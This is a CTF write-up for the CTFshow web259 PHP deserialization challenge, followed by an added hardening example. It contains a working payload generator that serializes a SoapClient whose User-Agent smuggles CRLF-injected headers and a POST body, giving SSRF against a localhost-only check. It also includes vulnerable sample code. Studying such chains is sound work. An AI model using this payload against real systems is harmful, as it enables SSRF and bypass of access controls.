CTFshow - Web Basics - Deserialization: web259
Challenge code
flag.php
```php
<?php
// Split the client-supplied X-Forwarded-For chain, drop the last entry,
// and treat the one before it as the "client IP".
$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip = array_pop($xff);
if ($ip !== '127.0.0.1') {
    die('error');
} else {
    $token = $_POST['token'];
    if ($token == 'ctfshow') {
        // $flag is provided by the challenge environment; it is not defined in the code shown.
        file_put_contents('flag.txt', $flag);
    }
}
```
index.php
```php
<?php
highlight_file(__FILE__);
$vip = unserialize($_GET['vip']);
// vip can get flag one key
$vip->getFlag();
```
Once the input has been unserialized into an object, calling a method that its class does not define invokes the class's __call magic method.
When the soap extension is enabled, the native SoapClient class's __call can be abused to issue an HTTP request, which gives SSRF.
Enabling the extension in phpstudy: in php.ini, remove the ; in front of extension=php_soap.dll.
Generate the payload with a PHP script:
```php
<?php
// Inject through the User-Agent header: the CRLF sequences end the UA line and
// let us append our own headers and a body. Content-Length: 13 covers exactly
// "token=ctfshow", so anything the library appends after it is ignored.
// Two X-Forwarded-For entries are needed because flag.php pops the last one
// and checks the one before it.
$ua = "ua\r\nX-Forwarded-For: 127.0.0.1,127.0.0.1\r\n"
    . "Content-Type: application/x-www-form-urlencoded\r\n"
    . "Content-Length: 13\r\n\r\n"
    . "token=ctfshow";
$soap = new SoapClient(null, array(
    'uri'        => 'http://127.0.0.1/',
    'location'   => 'http://127.0.0.1/flag.php',
    'user_agent' => $ua,
));
echo urlencode(serialize($soap));
```
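For contrast, here is how the two files could be hardened against this chain. This is an added example written for this page, not the challenge's code or part of the original writeup; the function names (loadVip, isLocalRequest, tokenIsValid, headerValueIsSafe) are this example's own, the expected token 'ctfshow' is reused from the challenge only for illustration, and the sample header string is constructed to mirror the payload above.

```php
<?php
// Added example: hardened counterparts to index.php and flag.php.
// Not the challenge's code; all function names below are hypothetical.

// 1. index.php: never let untrusted input pick the class that gets instantiated.
//    With allowed_classes => false, any object in the input is restored as
//    __PHP_Incomplete_Class, so SoapClient::__call (or any other magic method)
//    is never reachable. Refuse objects outright instead of calling methods on them.
function loadVip(string $serialized)
{
    $vip = @unserialize($serialized, ['allowed_classes' => false]);
    if (is_object($vip)) {
        return null;
    }
    return $vip;
}

// 2. flag.php: X-Forwarded-For is client-controlled (above it was injected via
//    CRLF in the User-Agent), so a "local only" check must use the socket
//    address, not the header. If a trusted reverse proxy sits in front, check
//    REMOTE_ADDR against that proxy's address and trust only the XFF entry it
//    appended; never accept arbitrary entries from the client.
function isLocalRequest(array $server): bool
{
    return ($server['REMOTE_ADDR'] ?? '') === '127.0.0.1';
}

// The original compares with ==, which is a loose comparison in PHP; use a
// strict, constant-time comparison for secrets.
function tokenIsValid($token, string $expected): bool
{
    return is_string($token) && hash_equals($expected, $token);
}

// 3. Any code that copies user-supplied values into outgoing HTTP headers (the
//    SoapClient user_agent option in the payload) must reject CR and LF, so a
//    single header value cannot be split into extra headers and a body.
function headerValueIsSafe(string $value): bool
{
    return preg_match('/[\r\n]/', $value) !== 1;
}

// Constructed demonstration input mirroring the writeup's injected User-Agent.
$injectedUa = "ua\r\nX-Forwarded-For: 127.0.0.1,127.0.0.1\r\n\r\ntoken=ctfshow";
var_dump(headerValueIsSafe($injectedUa));
var_dump(headerValueIsSafe('Mozilla/5.0'));

// Constructed demonstration: a serialized SoapClient no longer yields a usable object.
var_dump(loadVip('O:10:"SoapClient":0:{}'));

// How flag.php's gate would read with these helpers:
// if (!isLocalRequest($_SERVER) || !tokenIsValid($_POST['token'] ?? null, 'ctfshow')) {
//     die('error');
// }
```

The allowed_classes option is the key control for the deserialization half of the chain: the payload still parses, but PHP never constructs a real SoapClient, so there is no __call to trigger. The header check addresses the SSRF half, where the writeup's User-Agent value is what smuggles the forged X-Forwarded-For header and POST body.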